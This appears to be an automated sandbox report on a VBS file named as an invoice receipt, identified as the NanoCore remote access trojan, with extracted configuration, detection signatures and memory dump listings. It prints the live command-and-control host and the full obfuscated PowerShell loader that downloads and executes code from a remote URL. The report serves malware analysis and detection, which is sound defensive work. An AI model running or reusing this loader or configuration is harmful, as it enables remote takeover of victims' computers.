Analysis
-
max time kernel
119s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
14-01-2022 12:32
General
-
Target
G2M18C6INV0ICERECEIPT.vbs
-
Size
4KB
-
MD5
e193dff484ce89bc7ba5ae2022ab7227
-
SHA1
49d652b6e0fe6071b99fa9a7e891cc5187ebc4db
-
SHA256
1b8775fa633e04edf24411129b02074e4a9b8a79c28896908ff57dafe7cde968
-
SHA512
a5796933a05066bb69a14b7c4bf0a77d3e5f58572390f9d342a39a95c14b43a2a6e67f7e9ecc163fd75552cd6226274f065f41be2888089901c19431b96878c5
Score
10/10
Malware Config
Extracted
Family
nanocore
Version
1.2.2.0
C2
testalienscy9090.duckdns.org:9090
Mutex
fcfcc300-e950-40f9-b028-e26ea1764ca2
Attributes
-
activate_away_mode
true
-
backup_connection_host
testalienscy9090.duckdns.org
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-10-25T23:52:05.392054736Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
9090
-
default_group
test
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
fcfcc300-e950-40f9-b028-e26ea1764ca2
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
testalienscy9090.duckdns.org
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
true
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
suricata: ET MALWARE Possible NanoCore C2 60B
suricata: ET MALWARE Possible NanoCore C2 60B
-
Blocklisted process makes network request 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 10 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\G2M18C6INV0ICERECEIPT.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2724-150-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-117-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-116-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-118-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-119-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-120-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-121-0x00000199DFD00000-0x00000199DFD02000-memory.dmpFilesize
8KB
-
memory/2724-122-0x00000199DFD03000-0x00000199DFD05000-memory.dmpFilesize
8KB
-
memory/2724-123-0x00000199FA2A0000-0x00000199FA2C2000-memory.dmpFilesize
136KB
-
memory/2724-124-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-125-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-127-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-126-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-128-0x00000199FA450000-0x00000199FA4C6000-memory.dmpFilesize
472KB
-
memory/2724-129-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-135-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-136-0x00000199DFD06000-0x00000199DFD08000-memory.dmpFilesize
8KB
-
memory/2724-137-0x00000199DFB70000-0x00000199DFB72000-memory.dmpFilesize
8KB
-
memory/2724-147-0x00000199FA3F0000-0x00000199FA400000-memory.dmpFilesize
64KB
-
memory/2724-115-0x0000000000000000-mapping.dmp
-
memory/2824-151-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2824-160-0x00000000051C0000-0x00000000051CA000-memory.dmpFilesize
40KB
-
memory/2824-148-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2824-152-0x0000000000400000-0x0000000000438000-memory.dmpFilesize
224KB
-
memory/2824-153-0x0000000005370000-0x000000000586E000-memory.dmpFilesize
5.0MB
-
memory/2824-154-0x0000000004F50000-0x0000000004FE2000-memory.dmpFilesize
584KB
-
memory/2824-155-0x0000000005090000-0x000000000512C000-memory.dmpFilesize
624KB
-
memory/2824-156-0x0000000004E70000-0x000000000536E000-memory.dmpFilesize
5.0MB
-
memory/2824-157-0x0000000004F40000-0x0000000004F4A000-memory.dmpFilesize
40KB
-
memory/2824-158-0x0000000005060000-0x000000000506A000-memory.dmpFilesize
40KB
-
memory/2824-159-0x0000000005070000-0x000000000508E000-memory.dmpFilesize
120KB
-
memory/2824-149-0x000000000041E792-mapping.dmp
-
memory/2824-161-0x0000000005270000-0x0000000005282000-memory.dmpFilesize
72KB
-
memory/2824-162-0x00000000064A0000-0x00000000064BA000-memory.dmpFilesize
104KB
-
memory/2824-163-0x00000000064C0000-0x00000000064CE000-memory.dmpFilesize
56KB
-
memory/2824-164-0x00000000064D0000-0x00000000064E2000-memory.dmpFilesize
72KB
-
memory/2824-165-0x00000000064E0000-0x00000000064EC000-memory.dmpFilesize
48KB
-
memory/2824-166-0x00000000064F0000-0x00000000064FE000-memory.dmpFilesize
56KB
-
memory/2824-167-0x0000000006500000-0x0000000006514000-memory.dmpFilesize
80KB
-
memory/2824-168-0x0000000006510000-0x0000000006524000-memory.dmpFilesize
80KB
-
memory/2824-169-0x0000000006520000-0x000000000652E000-memory.dmpFilesize
56KB
-
memory/2824-170-0x0000000006540000-0x000000000656E000-memory.dmpFilesize
184KB
-
memory/2824-171-0x0000000006580000-0x0000000006594000-memory.dmpFilesize
80KB
-
memory/2824-172-0x0000000006750000-0x00000000067B6000-memory.dmpFilesize
408KB